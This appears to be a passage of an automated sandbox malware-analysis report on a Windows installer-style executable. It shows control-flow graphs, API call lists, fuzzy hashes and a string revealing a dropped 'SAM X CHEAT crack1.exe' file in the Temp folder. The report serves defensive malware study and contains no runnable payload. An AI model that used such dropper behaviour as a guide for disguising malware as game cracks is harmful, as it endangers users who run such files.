                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountTick$FileWritewsprintf
                                                                                                                                                                                                                                                                                      • String ID: ... %d%%$RwA$hLA$hLA
                                                                                                                                                                                                                                                                                      • API String ID: 4209647438-2619612001
                                                                                                                                                                                                                                                                                      • Opcode ID: addaab61d9762357401ed889a56f94317b04aa9940b264370ab1ae8ac3205c02
                                                                                                                                                                                                                                                                                      • Instruction ID: 8a95cf2a137d7550cfd21daf0583010478331d15a29cb338fc351ae0d0d0651f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: addaab61d9762357401ed889a56f94317b04aa9940b264370ab1ae8ac3205c02
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D261AE7190221AEBDB10DFA5DA44AAF7BB8EB40355F10417BF910B72C4D7789A40CBE9

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 335 401734-401757 call 402a0c call 405701 340 401761-401773 call 405ba1 call 405694 lstrcatA 335->340 341 401759-40175f call 405ba1 335->341 346 401778-40177e call 405e03 340->346 341->346 351 401783-401787 346->351 352 401789-401793 call 405e9c 351->352 353 4017ba-4017bd 351->353 360 4017a5-4017b7 352->360 361 401795-4017a3 CompareFileTime 352->361 355 4017c5-4017e1 call 405878 353->355 356 4017bf-4017c0 call 405859 353->356 363 4017e3-4017e6 355->363 364 401859-401882 call 404e8d call 402e71 355->364 356->355 360->353 361->360 366 4017e8-40182a call 405ba1 * 2 call 405bc3 call 405ba1 call 405462 363->366 367 40183b-401845 call 404e8d 363->367 378 401884-401888 364->378 379 40188a-401896 SetFileTime 364->379 366->351 399 401830-401831 366->399 376 40184e-401854 367->376 380 4028aa 376->380 378->379 382 40189c-4018a7 CloseHandle 378->382 379->382 384 4028ac-4028b0 380->384 385 4028a1-4028a4 382->385 386 4018ad-4018b0 382->386 385->380 388 4018b2-4018c3 call 405bc3 lstrcatA 386->388 389 4018c5-4018c8 call 405bc3 386->389 393 4018cd-402229 call 405462 388->393 389->393 393->384 402 402672-402679 393->402 399->376 401 401833-401834 399->401 401->367 402->385
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,00409C60,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                                                                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,00409C60,00409C60,00000000,00000000,00409C60,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405BA1: lstrcpynA.KERNEL32(?,?,00000400,004031BD,0042E440,NSIS Error), ref: 00405BAE
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrlenA.KERNEL32(00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000,?), ref: 00404EC6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrlenA.KERNEL32(00402FCC,00429898,00000000,004193F1,759223A0,?,?,?,?,?,?,?,?,?,00402FCC,00000000), ref: 00404ED6
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: lstrcatA.KERNEL32(00429898,00402FCC,00402FCC,00429898,00000000,004193F1,759223A0), ref: 00404EE9
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SetWindowTextA.USER32(00429898,00429898), ref: 00404EFB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F3B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00404E8D: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F49
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe, xrefs: 00401801, 0040181D
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401761
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe$C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                                                                      • API String ID: 1941528284-1106253351
                                                                                                                                                                                                                                                                                      • Opcode ID: ea3e664a6eeb0410f738fdec232e3058c6293e6be49e1c2e6a25c63ee9856d32
                                                                                                                                                                                                                                                                                      • Instruction ID: e79ae9243306ab86068bc1e71be5748962656d45b0e0834c5e2f96de839f3da3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea3e664a6eeb0410f738fdec232e3058c6293e6be49e1c2e6a25c63ee9856d32
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71419632914514BADF107BB9CC45EAF3679EF01329B20823BF421F11E1D77C9A418A6E

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 403 4015b3-4015c6 call 402a0c call 405728 408 4015c8-4015e3 call 4056bf CreateDirectoryA 403->408 409 40160a-40160d 403->409 418 401600-401608 408->418 419 4015e5-4015f0 GetLastError 408->419 411 40162d-40217f call 401423 409->411 412 40160f-401628 call 401423 call 405ba1 SetCurrentDirectoryA 409->412 425 4028a1-4028b0 411->425 412->425 418->408 418->409 422 4015f2-4015fb GetFileAttributesA 419->422 423 4015fd 419->423 422->418 422->423 423->418
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405728: CharNextA.USER32(004054DA,?,0042B4C8,00000000,0040578C,0042B4C8,0042B4C8,?,?,00000000,004054DA,?,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405736
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405728: CharNextA.USER32(00000000), ref: 0040573B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405728: CharNextA.USER32(00000000), ref: 0040574A
                                                                                                                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                                                                      • API String ID: 3751793516-1943935188
                                                                                                                                                                                                                                                                                      • Opcode ID: 4119a9241f750ab8e997e3db940842f9a3b25b0b78736786cf3fc51800a7fa31
                                                                                                                                                                                                                                                                                      • Instruction ID: bb8d1e4e690ad92a523629274e31cd42690718b140f669fc0321f517961e655e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4119a9241f750ab8e997e3db940842f9a3b25b0b78736786cf3fc51800a7fa31
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB010831908140AFDB217B795D44D6F77B49E56365B24063FF491B22E1C53C0941962E

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 428 405ec3-405ee3 GetSystemDirectoryA 429 405ee5 428->429 430 405ee7-405ee9 428->430 429->430 431 405ef9-405efb 430->431 432 405eeb-405ef3 430->432 434 405efc-405f2a wsprintfA LoadLibraryA 431->434 432->431 433 405ef5-405ef7 432->433 433->434
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405EDA
                                                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405F13
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?), ref: 00405F23
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                                                                                      • String ID: %s%s.dll$\
                                                                                                                                                                                                                                                                                      • API String ID: 2200240437-500877883
                                                                                                                                                                                                                                                                                      • Opcode ID: bac9a2fc6f46d7ce26ef8fb07d33782f421afe65be062073a8d3b7340457a89d
                                                                                                                                                                                                                                                                                      • Instruction ID: bb15d2e5d25401263bf0b052e26ed8f2ff91206720ea4b5c6b623b775464ebc4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bac9a2fc6f46d7ce26ef8fb07d33782f421afe65be062073a8d3b7340457a89d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FF02B309042095BDB149768DC0DEFB3B5CEB08304F1405BBA1C6E10D2E678ED558FD8

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 435 4058a7-4058b1 436 4058b2-4058dc GetTickCount GetTempFileNameA 435->436 437 4058eb-4058ed 436->437 438 4058de-4058e0 436->438 440 4058e5-4058e8 437->440 438->436 439 4058e2 438->439 439->440
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004058BA
                                                                                                                                                                                                                                                                                      • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058D4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\EsgeCzT4do.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                                                                                                                                                                                      • API String ID: 1716503409-1227339957
                                                                                                                                                                                                                                                                                      • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                                                                                                                                                      • Instruction ID: 40dff32a3e5f00750648796d4805ff32b13dc741bded237dc881b6ef32aeca23
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 91F0A73734820476E7105E55DC04B9B7F6DDF91750F14C027FD449A1C0D6B4995497A5

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 441 401dc1-401e10 call 402a0c * 4 call 401423 ShellExecuteA 452 4028a1-4028b0 441->452 453 401e16-402679 441->453 453->452
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E07
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp, xrefs: 00401DF2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                                                                                                                                                                      • API String ID: 587946157-1943935188
                                                                                                                                                                                                                                                                                      • Opcode ID: 508e7ba84609e5369f12698e1fd3433a9c7849af8c1e6b5c1e30901ebca3756d
                                                                                                                                                                                                                                                                                      • Instruction ID: ba14c07d206d1718bc9d8e8203e48321a71375e296f6bcf92d5e814be43a876d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508e7ba84609e5369f12698e1fd3433a9c7849af8c1e6b5c1e30901ebca3756d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6F0FC32B041406AD711BBB59D8EE5E2B659F41324F100637F400F71D2DDFC88415718

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 457 401389-40138e 458 4013fa-4013fc 457->458 459 401390-4013a0 458->459 460 4013fe 458->460 459->460 462 4013a2-4013a3 call 401434 459->462 461 401400-401401 460->461 464 4013a8-4013ad 462->464 465 401404-401409 464->465 466 4013af-4013b7 call 40136d 464->466 465->461 469 4013b9-4013bb 466->469 470 4013bd-4013c2 466->470 471 4013c4-4013c9 469->471 470->471 471->458 472 4013cb-4013f4 MulDiv SendMessageA 471->472 472->458
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                                                                                      • SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 42849ed48d919fde42c0d44f840d19e9f7e342482cf35ba8d4f2414d886d90f9
                                                                                                                                                                                                                                                                                      • Instruction ID: 86a6a9173f7d20567c8ae2bb249fddc303668c970c82e3d032b9735ebafba260
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42849ed48d919fde42c0d44f840d19e9f7e342482cf35ba8d4f2414d886d90f9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B30128317242209BE7195B399C05B6A369CE714328F50853BF851F72F2DA78DC039B8D

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 473 405f2d-405f47 GetModuleHandleA 474 405f53-405f60 GetProcAddress 473->474 475 405f49-405f4a call 405ec3 473->475 477 405f64-405f66 474->477 478 405f4f-405f51 475->478 478->474 479 405f62 478->479 479->477
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000000,00403179,0000000D,SETUPAPI,USERENV,UXTHEME), ref: 00405F3F
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00405F5A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405EC3: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405EDA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405F13
                                                                                                                                                                                                                                                                                        • Part of subcall function 00405EC3: LoadLibraryA.KERNELBASE(?), ref: 00405F23
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2048896177.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_EsgeCzT4do.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1ff86fa5640f02b1d9e100387d52f784ab4969e574a7c6b0b5bb7fb3ea5c422e
                                                                                                                                                                                                                                                                                      • Instruction ID: 5a94b1a02772503a3f00306f9b3f9683cc322e661ee482fd999d4dc3ca30496d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ff86fa5640f02b1d9e100387d52f784ab4969e574a7c6b0b5bb7fb3ea5c422e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AE0863260861176D6105B74AD0496B72A8DE8C7503054C7EF945F6190D738DC119AA9

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 480 405878-4058a4 GetFileAttributesA CreateFileA
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402C78,C:\Users\user\Desktop\EsgeCzT4do.exe,80000000,00000003), ref: 0040587C
                                                                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040589E
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2046665771.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2046518792.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047883595.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2047928366.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
